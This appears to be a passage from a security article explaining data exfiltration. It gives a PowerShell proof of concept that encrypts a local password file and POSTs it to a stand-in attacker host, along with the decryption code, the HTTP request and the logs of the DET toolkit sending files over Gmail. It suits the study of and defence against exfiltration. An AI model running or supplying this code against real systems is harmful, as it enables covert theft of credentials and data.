Before the actual data exfiltration takes place attackers usually compress, encrypt or encode the payload which is about to be sent to the attackers’ server. This is usually done by the backdoor itself or by using a third party tool, such as archiving software WinRAR. Usage of such techniques allows attackers to minimize the data being exfiltrated and obfuscates its contents in order to bypass network monitoring.
The following basic example of data exfiltration relies on PowerShell. The provided proof of concept code reads contents of a file from the local system, encrypts it with a variation of Advanced Encryption Standard (AES) and sends it to the attacker’s server via HTTP over the port 80. In most cases this approach raises no alarms and therefore can be used to perform stealth exfiltration.
$file = Get-Content C:\Users\RayC\Desktop\facebook_password.txt
$key = (New-Object System.Text.ASCIIEncoding).GetBytes("54b8617eca0e54c7d3c8e6732c6b687a")
$securestring = new-object System.Security.SecureString
foreach ($char in $file.toCharArray()) {
$secureString.AppendChar($char)
}
$encryptedData = ConvertFrom-SecureString -SecureString $secureString -Key $key
Invoke-WebRequest -Uri http://www.attacker.host/exfil -Method POST -Body $encryptedData
Once the PowerShell code is executed the following HTTP POST request is sent to the attacker’s server.
POST /exfil HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.3; en-GB) WindowsPowerShell/4.0
Content-Type: application/x-www-form-urlencoded
Host: www.attacker.host
Content-Length: 704
Expect: 100-continue
Connection: Keep-Alive
76492d1116743f0423413b16050a5345MgB8AEIANQBHADAAUgA0AEgAbABOAE8AcwA4AFMAWAB5AG4AKwBEAHQAdgBrAGcAPQA9AHwAMgBiAGIANQBhADgANgA0AGEAZgBhAGEANwA2ADMAMwA4ADAANABjADUAYQA5ADAAMAA1AGIAMAA4ADgANwAyADkAYgA0ADEAMgBjADcAYQA3ADcAYQAyADcANQAyADUANQA4ADgANAA4AGEAOQA4AGUAMwA1ADkANwA5AGQAYQA4ADcAMABjADIAOAA3ADIANQA5ADMAZQBhAGEAOQBiADgAYQA0ADMAOAA3ADYAZQAwADYAZQBlADcAMQBlADQAZQA0ADkAMgBmADgAYQA5ADQANgA2ADcAMwBhADQANAA3AGYANABiAGQAYgAwADUAOABhADAANABjADkAYQBjAGQAZQBkAGMANQA2ADgAZAA5ADYAMAA4ADgANABhADUANwBiAGIAMABhAGUANAAyADcAYQAzADEANABkADMAYgA1AGUAYgAyADkAOQBiADcAYgA3ADIAMwBkADcANQA2AGMANABlADMAZQA5AGMANwA5ADMAMwA1ADEAMABmAGEAMQA0ADIAMgAxADcAZQA0AGUAZgA2AGQANgBlADkAMgBmADkAZgBiADkAOQBjADIAYQAxAGIAOAAyADkAOABmAA==
Decryption of the data is straight forward and can be performed with a few lines of PowerShell code as shown below.
$key = (New-Object System.Text.ASCIIEncoding).GetBytes("54b8617eca0e54c7d3c8e6732c6b687a")
$encrypted = "76492d1116743f0423413b16050a5345MgB8AEIANQBHADAAUgA0AEgAbABOAE8AcwA4AFMAWAB5AG4AKwBEAHQAdgBrAGcAPQA9AHwAMgBiAGIANQBhADgANgA0AGEAZgBhAGEANwA2ADMAMwA4ADAANABjADUAYQA5ADAAMAA1AGIAMAA4ADgANwAyADkAYgA0ADEAMgBjADcAYQA3ADcAYQAyADcANQAyADUANQA4ADgANAA4AGEAOQA4AGUAMwA1ADkANwA5AGQAYQA4ADcAMABjADIAOAA3ADIANQA5ADMAZQBhAGEAOQBiADgAYQA0ADMAOAA3ADYAZQAwADYAZQBlADcAMQBlADQAZQA0ADkAMgBmADgAYQA5ADQANgA2ADcAMwBhADQANAA3AGYANABiAGQAYgAwADUAOABhADAANABjADkAYQBjAGQAZQBkAGMANQA2ADgAZAA5ADYAMAA4ADgANABhADUANwBiAGIAMABhAGUANAAyADcAYQAzADEANABkADMAYgA1AGUAYgAyADkAOQBiADcAYgA3ADIAMwBkADcANQA2AGMANABlADMAZQA5AGMANwA5ADMAMwA1ADEAMABmAGEAMQA0ADIAMgAxADcAZQA0AGUAZgA2AGQANgBlADkAMgBmADkAZgBiADkAOQBjADIAYQAxAGIAOAAyADkAOABmAA=="
echo $encrypted | ConvertTo-SecureString -key $key | ForEach-Object {[Runtime.InteropServices.Marshal]::PtrToStringAuto([Runtime.InteropServices.Marshal]::SecureStringToBSTR($_))}
Other common techniques of exfiltrating data include SMTP/IMAP and DNS protocols. An example of such techniques can be illustrated by using a Data Exfiltration Toolkit (DET). This tool supports a wide variety of data exfiltration techniques starting from a basic exfiltration over a TCP or UDP tunnel and ending with cloud based services like Gmail, Twitter or Google Docs. DET has the capability to perform prior compression and AES encryption of the payload. Additionally, a feature to define random time intervals between data bursts and the size of the data burst allows to blend the exfiltration traffic into regular network traffic generated by the user and thus making identification of data leakage difficult. The following command line and output illustrates an attempt to exfiltrate data over SMTP protocol by using a predefined mail box.
C:\Users\RayC\>det.py -c config -f Desktop\facebook_password.txt -p gmail
[2016-08-28.19:43:03] CTRL+C to kill DET
[2016-08-28.19:43:03] Launching thread for file Desktop\facebook_password.txt
[2016-08-28.19:43:03] Using gmail as transport method
[2016-08-28.19:43:03] [!] Registering packet for the file
[2016-08-28.19:43:04] [gmail] Sending 77 bytes in mail
[2016-08-28.19:43:05] Sleeping for 1 seconds
[2016-08-28.19:43:06] Using gmail as transport method
[2016-08-28.19:43:06] [gmail] Sending 174 bytes in mail
[2016-08-28.19:43:07] Sleeping for 1 seconds
[2016-08-28.19:43:08] Using gmail as transport method
[2016-08-28.19:43:09] [gmail] Sending 18 bytes in mail
Meanwhile, on the attacker’s server a DET listener is running and monitoring the same mail box for incoming files.
$ det.py -c config -L -p gmail
[2016-08-28.19:46:04] CTRL+C to kill DET
[2016-08-28.19:46:04] [gmail] Listening for mails...
[2016-08-28.19:46:08] Received 77 bytes
[2016-08-28.19:46:08] Register packet for file facebook_password.txt with checksum 420f595dce0dd2f9d54f66764766f699
[2016-08-28.19:46:11] Received 174 bytes
[2016-08-28.19:46:13] Received 18 bytes
[2016-08-28.19:46:13] File facebook_password.txt recovered
[2016-08-28.19:46:18] Killing DET and its subprocesses
$ cat facebook_password.txt
username: johndoe
password: YouWillNewverGuess!!!
Sometimes the information which is interesting for attackers is located on networks having no internet access. In such cases adversaries deploy more sophisticated malware which is able to breach those air-gapped networks and exfiltrate data. While various studies have been conducted to invent and validate techniques for data exfiltration from air-gapped networks, the most common technique used in the wild is USB drive based exfiltration. This technique relies on infecting a USB drive on the internet connected computer which later results to infection of an isolated system when the infected drive is attached to such a system. After the malware collected files from the air-gapped system, it stores those files on the same USB drive so that files can be retrieved when the drive is inserted into initial system. From this point, any of previously mentioned techniques can be used to exfiltrate the collected information from the target’s infrastructure.